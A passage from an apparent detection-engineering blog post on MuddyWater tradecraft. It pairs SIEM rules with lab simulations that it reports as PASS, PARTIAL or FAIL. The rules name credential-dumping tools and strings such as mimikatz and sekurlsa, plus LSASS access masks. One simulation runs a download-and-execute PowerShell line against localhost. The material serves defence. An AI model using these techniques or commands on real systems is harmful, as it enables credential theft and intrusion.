["w3wp.exe","java.exe","lsass.exe","services.exe",<br>                 "vmtoolsd.exe","vpnagent.exe"] AND<br>image IN ["cmd.exe","powershell.exe","wscript.exe","cscript.exe","bash.exe"] AND<br>(parent_user IN ["NETWORK SERVICE","IIS_IUSRS","SYSTEM"] OR<br> integrity_level = "System")</pre><p><strong>Key false positives:</strong> Legitimate administrative scripts under IIS application pools. Java-based monitoring agents that spawn processes. Tune by process hash allowlisting for known-good management tools.</p><h4>det_mw_0003 — PowerShell Encoded Command and Script Obfuscation</h4><p><em>Techniques: T1059.001, T1027 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> PowerShell obfuscation is a cross-cutting technique present in every MuddyWater tool tier — PowGoop (Base64 C2 setup), POWERSTATS (IEX + web request for stage delivery), and the 2024 lure campaigns (embedded API key executed via PowerShell). Three distinct usage patterns across tools required three rules.</p><p><strong>Why it’s built this way:</strong> Each rule targets a different MuddyWater PowerShell pattern with a different telemetry requirement.</p><p>Rule A targets PowGoop and POWERSTATS loader delivery. The regex \s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,} is deliberately written to match all unambiguous prefix forms of -EncodedCommand (-e, -ec, -en, -enc) while the 50-character minimum for the Base64 blob avoids matching the -Encoding parameter. This is the operator precision that matters: -Encoding UTF8 would otherwise match a naive regex.</p><p>Rule B targets POWERSTATS script execution behavior: IEX combined with a web request. This is the decoded content layer — it requires Script Block Logging (Event ID 4104), which is the capability gate that determines whether this detection class exists at all in a given environment.</p><p>Rule C is the delivery-context fallback: PowerShell spawned by an Office application, email client, or browser has no legitimate explanation in a standard enterprise environment and fires regardless of whether Script Block Logging is enabled.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rule B and for the highest-fidelity version of this detection. Sysmon Event ID 1 for Rules A and C. Without Script Block Logging, the detection degrades to command-line heuristics only.</p><pre># Rule A — Encoded command flag (all prefix forms: -e, -ec, -en, -enc ...)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line IMATCHES "\s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,}"</pre><pre># Rule B — Script Block content (Event ID 4104)<br>event_type = script_block_log AND<br>script_block_text MATCHES "(IEX|Invoke-Expression|InvokeScript)" AND<br>script_block_text MATCHES "(WebClient|Invoke-WebRequest|DownloadString|Net\.Http)"</pre><pre># Rule C — Suspicious parent process<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>parent_image IN ["OUTLOOK.EXE","winword.exe","excel.exe",<br>                 "chrome.exe","firefox.exe","msedge.exe","WScript.exe"]</pre><p><strong>Key false positives:</strong> Administrative scripts using -EncodedCommand for special characters. SCCM/Ansible deployments running Base64-encoded payloads. Baseline known-good encoded commands by hash before alerting on Rule A.</p><h4>det_mw_0004 — Unsigned DLL Loaded by Signed Executable</h4><p><em>Techniques: T1574.002 · Score: 3 (behavioral, partial validation)</em></p><p><strong>What it targets:</strong> PowGoop’s execution method — a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load it. Confirmed in 2024 toolset by INCD 2024.</p><p><strong>Why it’s built this way:</strong> Two rules serve different confidence tiers. Rule A is sourced directly from the documented PowGoop technique: the specific process name (GoogleUpdate.exe), DLL name (Goopdate.dll), and the fact that any path outside the Google installation directories is anomalous. The allowlist covers both x86 and x64 installation paths because omitting either creates a bypass. This combination — specific binary, specific DLL name, path outside expected directory — is near-unique and fires with high precision. Rule B is the generic behavioral net for future DLL side-loading variants where the actor may use different binary names — it trades precision for coverage against toolset evolution.</p><p>Score is 3 (not 5) because the lab’s stub DLL did not produce sufficient Sysmon EID 7 signal during validation. The detection logic is sound; the telemetry dependency (Sysmon image load events with signing status) is the constraint.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 7 (ImageLoad) with signed/unsigned status — this is the hard dependency. Without it, DLL loads are invisible to SIEM-based detection.</p><pre># Rule A — Specific IoC: GoogleUpdate loading Goopdate from non-Google path<br>event_type = image_load AND<br>image ENDSWITH "GoogleUpdate.exe" AND<br>loaded_image ENDSWITH "Goopdate.dll" AND<br>NOT (loaded_image_path STARTSWITH "C:\Program Files (x86)\Google\" OR<br>     loaded_image_path STARTSWITH "C:\Program Files\Google\")</pre><pre># Rule B — Generic: signed process loading unsigned DLL from user-writable path<br>event_type = image_load AND<br>process_signed = true AND<br>loaded_image_signed = false AND<br>loaded_image_path MATCHES "(\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> Third-party software shipping unsigned DLLs alongside signed executables (common). Developer workstations with locally compiled DLLs. Rule B requires environment-specific tuning before production deployment.</p><h4>det_mw_0005 — Registry Run Key and Startup Folder Persistence</h4><p><em>Techniques: T1547.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Multiple MuddyWater malware families use Run key persistence with actor-specific value names. Small Sieve: OutlookMicrosift (deliberate typo mimicking Microsoft). AA22-055A documents a second key: SystemTextEncoding. Canopy installs a WSF script in the startup folder — a sub-technique that doesn't appear as a Run key write.</p><p><strong>Why it’s built this way:</strong> Three rules cover three distinct persistence mechanisms across the malware catalog. Rule A is an exact-match IoC alert on the two named value names — it fires immediately on any match without needing path or parent context, because these specific strings have no legitimate usage in a standard enterprise environment. Rule B is the behavioral safety net for unknown or renamed values: path heuristic (AppData/Temp) combined with a non-installer parent covers the common pattern of malware writing its own persistence without using an installer. The process_integrity_level filter removes high-integrity (admin-level) processes from the behavioral rule because legitimate software installers typically run elevated. Rule C is added specifically to cover Canopy's startup folder WSF persistence, which doesn't show up as a Run key write at all — it's a file creation event.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 13 (registry value set) for Rules A and B. Sysmon Event ID 11 (file create) for Rule C.</p><pre># Rule A — Specific IoC: known MuddyWater Run key value names<br>event_type = registry_set AND<br>registry_key MATCHES "\\CurrentVersion\\Run" AND<br>registry_value_name IN ["OutlookMicrosift","SystemTextEncoding"]<br><br><br># Rule B - Behavioral: Run key pointing to writable/unusual path<br>event_type = registry_set AND<br>registry_key MATCHES "(HKCU|HKLM)\\.*\\CurrentVersion\\Run" AND<br>registry_value_data MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>process_image NOT IN ["msiexec.exe","setup.exe","install.exe","update.exe"] AND<br>process_integrity_level NOT IN ["High","System"]<br># Rule C - Script files written to startup folder (covers Canopy WSF)<br>event_type = file_create AND<br>file_path MATCHES "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" AND<br>file_extension IN ["wsf","vbs","js","ps1","bat","cmd"]</pre><p><strong>Key false positives:</strong> Rule A has essentially zero false positives on the specific value names. Rule B requires installer process exclusion — the list is environment-specific. Rule C may fire on legitimate startup scripts deployed by IT via Group Policy; exclude by file hash or signer.</p><h4>det_mw_0006 — Scheduled Task with 43-Minute Beacon Interval</h4><p><em>Techniques: T1053.005 · Score: 4 (correlated analytic)</em></p><p><strong>What it targets:</strong> BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing — a specific behavioral fingerprint documented in the INCD 2024 report. The interval is documented as customizable, but 43 minutes is the observed operational value.</p><p><strong>Why it’s built this way:</strong> The 43-minute interval is the single most precise artifact in the entire procedure dataset. Rule A is designed as a high-fidelity immediate alert requiring no tuning: PT43M is the ISO 8601 duration format for 43 minutes and appears verbatim in the Windows Task XML. This fires with near-zero false positives because no legitimate software uses a 43-minute repeat interval for any standard purpose. Rule B generalizes the pattern for future BugSleep variants that may use a different interval: short repetition (under 60 minutes) combined with a task action pointing to a user-writable path is anomalous regardless of exact interval. Rule C is the telemetry fallback — many environments do not forward Task Scheduler event logs to SIEM, but schtasks.exe process creation (Sysmon EID 1) is more commonly collected and captures the command line.</p><p>Score is 4 (not 5) because this is a single-source procedure — INCD 2024 only. Before treating Rule A as a high-confidence production alert, corroborate with a second vendor source.</p><p><strong>Required telemetry:</strong> Windows Security Event ID 4698 (scheduled task created) or Task Scheduler operational log for Rules A and B. Sysmon Event ID 1 for Rule C.</p><pre># Rule A — Specific: 43-minute interval (BugSleep artifact) — immediate alert<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval = "PT43M"<br><br># Rule B - Behavioral: short interval + suspicious action path<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval_minutes &lt; 60 AND<br>task_action_path MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>creating_process NOT IN ["svchost.exe","taskeng.exe","msiexec.exe"]<br># Rule C - Sysmon command line fallback<br>event_type = process_create AND<br>image ENDSWITH "schtasks.exe" AND<br>command_line MATCHES "/create" AND<br>command_line MATCHES "(AppData|Temp|ProgramData)"</pre><p><strong>Key false positives:</strong> Backup and monitoring software creating frequent tasks. Browser update mechanisms. Rule B requires interval baseline per environment before production deployment.</p><h4>det_mw_0007 — RMM Tool Executed from User-Writable Path</h4><p><em>Techniques: T1219 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> RMM tool abuse is the most consistently documented MuddyWater technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple sources), SimpleHelp, Level, PDQConnect (2024).</p><p><strong>Why it’s built this way:</strong> RMM tool detection is inherently a context problem. The binary is legitimate. The network traffic to vendor infrastructure is legitimate. Only the delivery chain and execution path are anomalous. Three rules address this from different angles.</p><p>Rule A uses path as the primary signal: a legitimately IT-deployed RMM tool installs to Program Files or a managed path, not AppData/Temp/Downloads. A known RMM binary executing from a user-writable path means it was delivered, not installed by IT.</p><p>Rule B uses parent process as the signal: no legitimate RMM deployment is spawned by Outlook, a browser, or an archive utility. This is the delivery-context constraint — if an RMM binary’s parent is OUTLOOK.EXE, the delivery chain is phishing regardless of what the binary is.</p><p>Rule C uses network destination: RMM infrastructure connections from endpoints with no authorized RMM deployment are anomalous. Rules A+C together — RMM binary from writable path plus outbound connection to vendor domain — form the highest-confidence combined signal.</p><p><strong>The baseline prerequisite is non-negotiable.</strong> Rule C without a baseline of authorized RMM deployments per endpoint generates constant noise in any environment that legitimately uses RMM tools. This is the single highest-ROI detection in the dataset if the baseline is clean.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with parent image and file path. Network flow or proxy logs with process name attribution for Rule C.</p><pre># Rule A — Known RMM binary from non-standard installation path<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR<br> image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR<br> image ENDSWITH "rport.exe" OR<br> image ENDSWITH "SyncroRAT.exe" OR<br> image ENDSWITH "Level.exe" OR<br> image ENDSWITH "PDQConnect.exe") AND<br>image_path MATCHES "(\\AppData\\|\\Temp\\|\\Downloads\\|\\Users\\[^\\]+\\Desktop\\)"<br><br># Rule B - RMM binary spawned by email client or browser<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR image ENDSWITH "rport.exe") AND<br>parent_image IN ["OUTLOOK.EXE","outlook.exe","chrome.exe","firefox.exe",<br>                 "msedge.exe","7zFM.exe","WinRAR.exe","explorer.exe"]<br># Rule C - Outbound connection to RMM vendor infrastructure from unexpected endpoint<br>event_type = network_connection AND<br>destination_domain MATCHES "(atera\.com|screenconnect\.com|simplehelp\.net|syncromsp\.com)" AND<br>source_process NOT IN [known_rmm_processes_baseline]</pre><p><strong>Key false positives:</strong> All RMM tools are legitimate software — the entire detection depends on delivery context and path. Authorized deployments must be baselined per endpoint before any rule produces useful signal. Help desk technicians installing RMM from their downloads folder will match Rule A; exclude by user account or machine type.</p><h4>det_mw_0008a — Non-Browser Process Connecting to Telegram Bot API</h4><p><em>Techniques: T1071.001, T1102 · Score: 3 (behavioral, partially validated)</em></p><p><strong>What it targets:</strong> Small Sieve beacons exclusively via the Telegram Bot API (api.telegram.org) over HTTPS. This is one of the most specific C2 channels documented for MuddyWater — a fixed, known hostname with no CDN rotation.</p><p><strong>Why it’s built this way:</strong> The detection is single-rule because the signal is specific enough not to need graduated fallbacks. api.telegram.org is a fixed hostname. The discriminating condition is not the domain but the process: in enterprise environments where Telegram is not a standard application, any process connecting to this endpoint is anomalous. The approach is deliberately narrow — it will miss if MuddyWater switches from Telegram to another messaging API, but fires with high precision on the documented Small Sieve C2 channel.</p><p>Score is 3 because VirtualBox NAT blocked outbound Telegram connections in the lab, preventing full Kibana validation of the network connection event.</p><p><strong>Required telemetry:</strong> DNS query logs or network flow logs with process name attribution. In environments without process-attributed network telemetry, this degrades to a domain-based alert with no process context.</p><pre>event_type = network_connection AND<br>destination_domain = "api.telegram.org" AND<br>destination_port = 443 AND<br>source_process NOT IN ["Telegram.exe","telegram.exe","chrome.exe",<br>                        "firefox.exe","msedge.exe","iexplore.exe"]</pre><p><strong>Key false positives:</strong> Telegram desktop application where it is approved. Bot developers testing scripts from dev workstations. In organizations where Telegram is standard, strict process allowlisting is required before this detection is useful.</p><h4>det_mw_0008b — DNS Tunneling Volume and Entropy</h4><p><em>Techniques: T1572 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Mori, MuddyWater’s DNS-tunneling backdoor, uses DNS queries as the C2 channel. DNS tunneling encodes data in subdomain labels, producing distinctive patterns: high query volume to a single domain, unusually long subdomain strings, and high Shannon entropy in the label content.</p><p><strong>Why it’s built this way:</strong> DNS tunneling detection cannot rely on a single heuristic because each heuristic has a different failure mode. Volume (Rule A) catches high-throughput tunneling but misses slow/low-rate tools that deliberately throttle to blend in. Label length (Rule B) catches encoded payloads regardless of rate or entropy but misses short encoded segments. Entropy (Rule C) catches random-looking subdomains at any length and rate but produces noise on CDN hash labels without a comprehensive baseline. The three rules are additive — any single trigger warrants investigation, two or more from the same source are high-confidence.</p><p>The thresholds (&gt;100 queries per 60 seconds, &gt;40-character labels, &gt;3.5 Shannon entropy) were validated in the lab by generating 180 DNS queries with 42-character random subdomains from the simulation playbook.</p><p><strong>Required telemetry:</strong> DNS resolver logs with full QNAME — not available in all environments. If only DNS flow logs (not query content) are available, Rule B and Rule C are unavailable.</p><pre># Rule A — High query volume to single parent domain<br>event_type = dns_query<br>GROUP BY source_ip, query_domain_parent<br>HAVING COUNT(*) &gt; 100 WITHIN 60 seconds<br><br># Rule B - Long subdomain labels (&gt;40 chars indicates encoded payload)<br>event_type = dns_query AND<br>LENGTH(subdomain_label) &gt; 40<br># Rule C - High entropy subdomains (random-looking encoded content)<br>event_type = dns_query AND<br>SHANNON_ENTROPY(subdomain_label) &gt; 3.5 AND<br>subdomain_label NOT IN [known_cdn_domains_baseline]</pre><p><strong>Key false positives:</strong> CDN domains using hash-based subdomains (Akamai, Cloudflare, AWS) — require comprehensive allowlist for Rule C. DNSSEC validation traffic with long encoded keys. Calibrate thresholds against your specific environment’s DNS baseline before deploying Rule A in production.</p><h4>det_mw_0009 — WMI SecurityCenter2 Discovery Survey</h4><p><em>Techniques: T1047, T1082, T1016, T1033, T1518.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> CISA AA22–055A reproduces the exact PowerShell survey script MuddyWater uses post-access: a WMI query chain that collects IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username (Win32_ComputerSystem), and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2.</p><p><strong>Why it’s built this way:</strong> The detection anchors on SecurityCenter2\AntiVirusProduct because it is the highest-specificity WMI class in the documented survey. The other classes — OS name, IP addresses, hostname — are queried by dozens of legitimate monitoring tools. AntiVirusProduct enumeration has a much smaller legitimate caller population: primarily AV management consoles and endpoint security platforms. This makes it the most reliable low-noise signal from the full survey chain.</p><p>Three rules are layered by telemetry quality. Rule A requires Script Block Logging (highest fidelity, decoded script content visible). Rule B falls back to command-line logging — medium fidelity, only fires if SecurityCenter2 appears in the literal command line, not in a decoded payload. Rule C is the most specific: a multi-class pattern that matches the complete documented survey chain, covering all five ATT&amp;CK techniques in a single event. T1033 coverage was added to Rule C via Win32_ComputerSystem during the analyst review pass — it was missing from the initial draft.</p><p>Rule C matches the CISA-documented script closely enough to be treated as near-exact-match when observed.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rules A and C. Sysmon Event ID 1 for Rule B.</p><pre># Rule A — Script Block captures SecurityCenter2 query<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "AntiVirusProduct"<br><br># Rule B - Process command line contains SecurityCenter2 (fallback without SBL)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line MATCHES "SecurityCenter2"<br># Rule C - Full survey pattern: all 5 ATT&amp;CK techniques in one event<br># T1518.001 (AV enum) + T1016 (network config) + T1082 (OS info) + T1033 (username)<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "Win32_NetworkAdapterConfiguration" AND<br>script_block_text MATCHES "Win32_OperatingSystem" AND<br>script_block_text MATCHES "(Win32_ComputerSystem|Win32_UserAccount|UserName)"</pre><p><strong>Key false positives:</strong> AV management software and endpoint security platforms querying SecurityCenter2. IT inventory tools (Lansweeper, SCCM hardware inventory). Exclude by process hash or signer rather than by process name, since attackers can rename their scripts.</p><h4>det_mw_0010 — LSASS Memory Access and Credential Tool Execution</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/699/1*J0Q8ExDAG7jBY7duoI35MA.png"></figure><p><em>Techniques: T1003.001, T1003.004, T1003.005 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater performs credential access using three tools documented in CISA AA22–055A: Mimikatz and procdump64.exe against LSASS memory (T1003.001), and LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005).</p><p><strong>Why it’s built this way:</strong> Three independent rules cover the full credential dumping lifecycle, each with a different detection philosophy.</p><p>Rule A is the design priority: a process accessing LSASS memory is the universal pre-condition for any LSASS dump, regardless of tool. Detecting the access event (Sysmon EID 10) rather than the tool name means Rule A fires on Mimikatz, procdump, custom C++ loaders, and any future variant — as long as the access mask is in the covered set. The access masks were sourced from established Mimikatz research (0x1010, 0x1410, 0x1438, 0x143a, 0x1418) and extended with 0x1fffff (PROCESS_ALL_ACCESS, used by custom dumpers) and 0x1f0fff (another all-access variant observed in the field). The exclusion list covers known legitimate callers — AV engines, CSrss, WinInit — without which this rule generates constant noise from endpoint security products.</p><p>Rule B is the name-based backstop. Lower fidelity because it misses renamed tools, but catches actors using stock Mimikatz. The analyst review pass re-bracketed the command_line clause to keep it inside the event_type guard — a real operator precedence bug that would have caused the command-line check to match events outside the process_create filter.</p><p>Rule C catches the dump artifact on disk — a final fallback when process-level events are unavailable. .dmp files in user-writable paths are anomalous outside of Windows Error Reporting, which writes to a fixed known path.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 10 (ProcessAccess) with explicit lsass.exe targeting in the Sysmon configuration — this is not enabled by default. Without it, Rule A does not exist. Sysmon Event ID 1 for Rule B. Sysmon Event ID 11 for Rule C.</p><pre># Rule A — LSASS process access (tool-agnostic, highest confidence)<br>event_type = process_access AND<br>target_image ENDSWITH "lsass.exe" AND<br>granted_access MATCHES "(0x1010|0x1410|0x1438|0x143a|0x1418|0x1fffff|0x1f0fff)" AND<br>source_image NOT IN ["MsMpEng.exe","csrss.exe","wininit.exe","svchost.exe",<br>                     "SecurityHealthService.exe","CylanceSvc.exe","SentinelAgent.exe"]<br><br># Rule B - Known credential tool execution (name-based backstop)<br># command_line clause is bracketed inside event_type guard (bug fix in review)<br>event_type = process_create AND<br>(image IMATCHES "mimikatz\.exe" OR<br> image ENDSWITH "procdump64.exe" OR<br> image IMATCHES "lazagne\.exe" OR<br> command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)")<br># Rule C - Dump file creation in user-writable path (artifact backstop)<br>event_type = file_create AND<br>file_extension = "dmp" AND<br>file_path MATCHES "(\\AppData\\|\\Temp\\|\\Users\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> AV and EDR agents that legitimately access LSASS — exclude by process hash, not name, since names are spoofable. Windows Error Reporting creating .dmp files in %TEMP%\WER — exclude that specific path in Rule C. Legitimate procdump usage by developers for application crash diagnostics — require a separate approved-tools baseline.</p><p><strong>Important environment note:</strong> Credential Guard and PPL (Protected Process Light) prevent LSASS reads on modern, hardened systems. If your environment has these enabled, LSASS dump detection is still valuable as a canary for misconfigured or unpatched endpoints, but confirm protection status before using coverage scores here as a measure of actual protection.</p><h3>Phase 5: Validation Lab</h3><h4>Architecture</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8U-N2gM0mGw6qRI7SG06dw.png"></figure><h4>Deploy in One Command</h4><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env   # fill in passwords<br>bash start.sh</pre><p>start.sh creates the Docker network, starts all stack services, waits for Elasticsearch, boots the Windows 10 Vagrant VM, provisions it via Ansible (Sysmon + Script Block Logging + Winlogbeat), and runs all 11 simulations.</p><h4>Simulation Design</h4><p>Every simulation is <strong>benign-by-design</strong>:</p><ul><li>No live malware, no real C2, no credential exfiltration</li><li>Simulations write benign files (VBScript with Write-Host payload), run real Windows binaries with harmless arguments, or use .NET to open process handles with minimal access masks</li><li>All .dmp files are deleted immediately after event confirmation</li><li>The VM does not connect to real Telegram infrastructure</li></ul><p>The Ansible playbook (lab/ansible/playbooks/validate.yml) runs each simulation, waits 3 seconds, queries the Windows Event Log with Get-WinEvent -FilterHashtable (time-bounded to the last 60 seconds), and prints PASS / FAIL.</p><h4>Step 21: det_mw_0001 — Spearphishing Delivery Chain</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8bLoGgU_easNlOr4ZndCgg.png"></figure><p><strong>What MuddyWater does:</strong> Delivers a ZIP or Office file via email or Egnyte/OneDrive link. The attachment contains a VBScript or WSF file that spawns a hidden encoded PowerShell loader (PowGoop/POWERSTATS).</p><p><strong>Simulation:</strong> wscript.exe sim_delivery.vbs → powershell.exe -WindowStyle Hidden -NonInteractive -EncodedCommand &lt;Base64&gt;</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *powershell.exe*<br>AND winlog.event_data.CommandLine: *EncodedCommand*</pre><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → powershell.exe -EncodedCommand. Parent-child chain and Base64 command line both visible in Kibana.</p><h4>Step 22: det_mw_0002 — Web Service Shell Spawn</h4><p><strong>What MuddyWater does:</strong> Exploits Exchange (CVE-2020–0688), IIS, or Log4j (CVE-2021–44228) — web-facing service spawns cmd.exe or powershell.exe for post-exploitation recon.</p><p><strong>Simulation:</strong> wscript.exe sim_exploit.vbs → cmd.exe /c whoami &amp; hostname &amp; ipconfig /all</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *cmd.exe*<br>AND winlog.event_data.CommandLine: (*whoami* OR *hostname* OR *ipconfig*)</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PdbeaS4qAhZO0Abz1vnxlw.png"></figure><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → cmd.exe with recon commands in CommandLine.</p><h4>Step 23: det_mw_0003 — PowerShell Encoded Command</h4><p><strong>What MuddyWater does:</strong> PowGoop uses -EncodedCommand for C2 setup. POWERSTATS uses IEX + (New-Object Net.WebClient).DownloadString(...) for stager execution.</p><p><strong>Rule A simulation:</strong> powershell.exe -NonInteractive -e &lt;Base64(Write-Host "test")&gt;</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.CommandLine: *-e*<br>AND winlog.event_data.CommandLine: *[A-Za-z0-9+/]{40,}*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t-a6QvN0QQMAwrYTgedLgw.png"></figure><p><strong>Rule A Result: PASS</strong> — 4 events captured. PowerShell with Base64 blob visible in command line.</p><p><strong>Rule B simulation:</strong> IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:19999/...'))</p><p><strong>KQL — Rule B:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *IEX*<br>AND winlog.event_data.ScriptBlockText: *DownloadString*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-VDCsOq78LyTENKxOUQjJg.png"></figure><p><strong>Rule B Result: PASS</strong> — 16 EID 4104 events. Script Block Logging decoded the IEX + DownloadString pattern.</p><blockquote><strong><em>Capability gate:</em></strong><em> Script Block Logging (EID 4104) must be explicitly enabled. Without it, Rule B is unavailable and detection degrades to command-line heuristics only.</em></blockquote><h4>Step 24: det_mw_0004 — DLL Side-Loading</h4><p><strong>What MuddyWater does:</strong> PowGoop drops Goopdate.dll alongside a copy of GoogleUpdate.exe outside the legitimate Google installation path. When GoogleUpdate launches, Windows loads the malicious DLL.</p><p><strong>Simulation:</strong> Copy a benign 4-byte MZ stub as goopdate.dll into a test directory alongside a signed binary. Launch the binary.</p><p><strong>Result: PARTIAL</strong> — Sysmon EID 7 (ImageLoad) did not fire. Root cause: a 4-byte MZ stub is not a valid loadable DLL — the Windows loader rejects it before generating an EID 7 event. The Sysmon config and detection rule are correct. <strong>Resolution:</strong> Re-test with a real GoogleUpdate.exe (requires Google Chrome installed on lab VM).</p><h4>Step 25: det_mw_0005 — Registry Run Key Persistence</h4><p><strong>What MuddyWater does:</strong> Small Sieve writes OutlookMicrosift to HKCU\...\CurrentVersion\Run — a deliberate typo designed to look like a Microsoft entry. Canopy drops a .wsf file to the Startup folder.</p><p><strong>Rule A simulation:</strong> Write OutlookMicrosift = notepad.exe to HKCU\...\Run</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 13<br>AND winlog.event_data.TargetObject: *CurrentVersion\Run\OutlookMicrosift*</pre><p><strong>Rule A Result: PASS</strong> — 3 Sysmon EID 13 events. OutlookMicrosift Run key captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RTAU8BoEU41ydMrali20PA.png"></figure><p><strong>Rule C simulation:</strong> Copy a benign .wsf file to %APPDATA%\...\Start Menu\Programs\Startup\</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *\Startup\*<br>AND winlog.event_data.TargetFilename: *.wsf*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C6VaYiU1W6t9P7VM9Uyq6Q.png"></figure><p><strong>Rule C Result: PASS</strong> — 3 Sysmon EID 11 events. WSF file creation in Startup folder captured.</p><h4>Step 26: det_mw_0006 — Scheduled Task (43-Minute Beacon)</h4><p><strong>What MuddyWater does:</strong> BugSleep creates a scheduled task triggered every <strong>43 minutes</strong>. This interval is a BugSleep artifact — not a default, not a round number. It appears in INCD 2024 reporting and is one of the most precise technical IoCs in the dataset.</p><p><strong>Simulation:</strong> schtasks.exe /create /tn DH-SIM-0006-TestTask /tr notepad.exe /sc MINUTE /mo 43 /f</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\schtasks.exe*<br>AND winlog.event_data.CommandLine: */mo 43*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8a6plhGCKeJFpgCePxizDA.png"></figure><p><strong>Result: PASS</strong> — 3 Sysmon EID 1 events. schtasks.exe /mo 43 captured. The 43-minute interval in the command line is the exact BugSleep artifact.</p><blockquote><strong><em>Hunt value:</em></strong><em> </em><em>PT43M in Task Scheduler Operational logs is a retroactive hunt trigger. One match = investigate immediately. No legitimate software uses this exact interval.</em></blockquote><h4>Step 27: det_mw_0007 — RMM Tool Abuse</h4><p><strong>What MuddyWater does:</strong> Delivers a legitimate RMM binary (ScreenConnect, SimpleHelp, AteraAgent, Level, PDQConnect) via phishing email or file-sharing link. The binary is placed in AppData, Temp, or Downloads — not installed by an IT management system. This is documented in all five government source tiers.</p><p><strong>Simulation:</strong> Copy ScreenConnect.ClientService.exe to C:\Temp\dh-lab\ and launch it.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\Temp\ScreenConnect*</pre><p><strong>Result: PASS</strong> — 6 Sysmon EID 1 events. RMM binary executing from \Temp\ captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U9wgP3tZtCZYaEGIct6woQ.png"></figure><blockquote><strong><em>Production requirement:</em></strong><em> This detection requires a baseline of authorized RMM deployments per endpoint. Without the baseline, it generates noise. With it, any out-of-baseline RMM execution is an immediate high-confidence alert.</em></blockquote><h4>Step 28: det_mw_0008a — Telegram Bot API C2</h4><p><strong>What MuddyWater does:</strong> Small Sieve uses the Telegram Bot API (api.telegram.org:443) for C2 over HTTPS. In an enterprise environment where Telegram is not standard software, any non-browser process connecting to this domain is anomalous.</p><p><strong>Simulation:</strong> powershell.exe makes an HTTP request to https://api.telegram.org/botTEST/getMe (invalid token — 401 response; the connection attempt is the evidence).</p><p><strong>Result: FAIL</strong> — Sysmon EID 3 (NetworkConnect) did not fire. Root cause: VirtualBox NAT prevents Sysmon from capturing the outbound network connection to api.telegram.org in the lab environment. The Sysmon rule config is correct. <strong>Resolution:</strong> Re-test with a host-only NIC that provides direct internet access.</p><h4>Step 29: det_mw_0008b — DNS Tunneling</h4><p><strong>What MuddyWater does:</strong> Mori uses DNS tunneling for C2. High-volume queries with long, high-entropy 